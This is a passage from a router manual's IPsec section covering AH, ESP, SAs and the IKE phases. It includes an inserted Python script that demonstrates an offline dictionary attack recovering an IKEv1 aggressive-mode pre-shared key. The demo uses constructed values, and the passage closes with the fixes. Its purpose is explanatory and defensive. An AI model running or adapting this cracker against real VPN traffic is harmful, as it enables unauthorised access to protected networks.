5.6.2. IPsec

IPsec is a protocol suite for securing IP communications by authenticating and encrypting each packet of a communication session and thus establishing a secure virtual private network.
IPsec includes various cryptographic protocols and ciphers for key exchange and data encryption and can be seen as one of the strongest VPN technologies in terms of security. It uses the following mechanisms:
Mechanism  Description
AH         Authentication Headers (AH) provide connectionless integrity and data origin authentication for IP datagrams and protect against replay attacks.
ESP        Encapsulating Security Payloads (ESP) provide confidentiality, data origin authentication, connectionless integrity, an anti-replay service and limited traffic-flow confidentiality.
SA         Security Associations (SA) describe a secure channel: the bundle of algorithms, keys and parameters necessary to operate AH and/or ESP on it. The Internet Security Association and Key Management Protocol (ISAKMP) provides the framework for authenticated key exchange used to establish them.
Negotiating keys for encryption and authentication is generally done by the Internet Key Exchange protocol (IKE), which consists of two phases:
Phase        Description
IKE phase 1  IKE authenticates the peer during this phase to set up an ISAKMP security association. This can be carried out in either main or aggressive mode. Main mode uses the Diffie-Hellman key exchange, and the authentication is always encrypted with the negotiated key. Aggressive mode only sends hashes derived from the pre-shared key, in the clear, and therefore represents a less secure mechanism which should generally be avoided, as it is prone to offline dictionary attacks.
IKE phase 2  IKE finally negotiates the IPsec SA parameters and keys and sets up matching IPsec SAs in the peers, which are required for AH/ESP later on.
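The following is an added example, not part of the manual or of the router's firmware, showing why the table above tells you to avoid aggressive mode with a pre-shared key. It implements the RFC 2409 (IKEv1) PSK formulas SKEYID = prf(PSK, Ni_b | Nr_b) and HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b): in aggressive mode every input to HASH_R except the PSK is sent unencrypted, so a passive listener can test candidate PSKs offline. The nonces, cookies, Diffie-Hellman values, SA body, identity and the PSK "Summer2015" are constructed placeholders, not a real capture, and HMAC-SHA1 is assumed as the negotiated prf.

```python
"""Added example: offline dictionary attack against IKEv1 aggressive mode PSK
authentication, built from the RFC 2409 section 5 formulas. All values are
constructed for illustration; nothing here comes from a real capture."""
import hashlib
import hmac
from dataclasses import dataclass
from typing import Iterable, Optional


def prf(key: bytes, data: bytes) -> bytes:
    """IKEv1 prf: HMAC keyed with the negotiated hash (HMAC-SHA1 assumed here)."""
    return hmac.new(key, data, hashlib.sha1).digest()


def skeyid_psk(psk: bytes, ni: bytes, nr: bytes) -> bytes:
    """RFC 2409: for PSK authentication, SKEYID = prf(pre-shared-key, Ni_b | Nr_b)."""
    return prf(psk, ni + nr)


@dataclass(frozen=True)
class AggressiveModeCapture:
    """Everything a passive observer sees in the clear during aggressive mode.

    In aggressive mode the responder's ID and HASH_R travel unencrypted in
    message 2, before any session key exists. In main mode they are sent in
    message 6 under a key derived from g^xy, which a passive observer lacks,
    so the same attack does not work there without an active position.
    """
    ni: bytes        # initiator nonce
    nr: bytes        # responder nonce
    gxi: bytes       # initiator Diffie-Hellman public value g^xi
    gxr: bytes       # responder Diffie-Hellman public value g^xr
    cky_i: bytes     # initiator cookie (8 bytes)
    cky_r: bytes     # responder cookie (8 bytes)
    sai_b: bytes     # body of the initiator's SA payload
    idir_b: bytes    # body of the responder's ID payload
    hash_r: bytes    # HASH_R as sent by the responder


def compute_hash_r(psk: bytes, c: AggressiveModeCapture) -> bytes:
    """RFC 2409: HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b).

    Every input except the PSK is public, so a candidate PSK can be checked
    against the observed HASH_R without interacting with either peer.
    """
    skeyid = skeyid_psk(psk, c.ni, c.nr)
    return prf(skeyid, c.gxr + c.gxi + c.cky_r + c.cky_i + c.sai_b + c.idir_b)


def crack_psk(c: AggressiveModeCapture, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: return the first candidate reproducing HASH_R."""
    for candidate in wordlist:
        if hmac.compare_digest(compute_hash_r(candidate.encode(), c), c.hash_r):
            return candidate
    return None


def build_capture(psk: bytes) -> AggressiveModeCapture:
    """Simulate the responder with fixed, constructed public values.

    The DH values are placeholders of the right role, not real group members;
    the attack does not depend on their contents, only on their being public.
    """
    fields = dict(
        ni=bytes.fromhex("a1" * 16),
        nr=bytes.fromhex("b2" * 16),
        gxi=bytes.fromhex("c3" * 128),
        gxr=bytes.fromhex("d4" * 128),
        cky_i=bytes.fromhex("0102030405060708"),
        cky_r=bytes.fromhex("1112131415161718"),
        # Constructed, truncated SA payload body (DOI, situation, proposal header)
        sai_b=bytes.fromhex("00000001000000010000002c01010001") + bytes(32),
        # ID payload body: type 2 = ID_FQDN, protocol and port zero, then the name
        idir_b=b"\x02\x00\x00\x00" + b"vpn.example.com",
    )
    probe = AggressiveModeCapture(hash_r=b"", **fields)
    return AggressiveModeCapture(hash_r=compute_hash_r(psk, probe), **fields)


# Constructed scenario: a weak PSK on the responder and a small wordlist.
CAPTURE = build_capture(b"Summer2015")
WORDLIST = ["password", "vpn123", "Summer2015", "correct horse battery staple"]

if __name__ == "__main__":
    print("recovered PSK:", crack_psk(CAPTURE, WORDLIST))
```

The decisive detail is in compute_hash_r: g^xy never enters the computation, only the public values g^xi and g^xr, so a PSK that appears in any wordlist is recoverable from a single captured exchange. Main mode (or IKEv2 with certificates) is the practical fix; a long random PSK only raises the cost of the same attack.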
NB3000-Line-Hd User Manual 4.2
103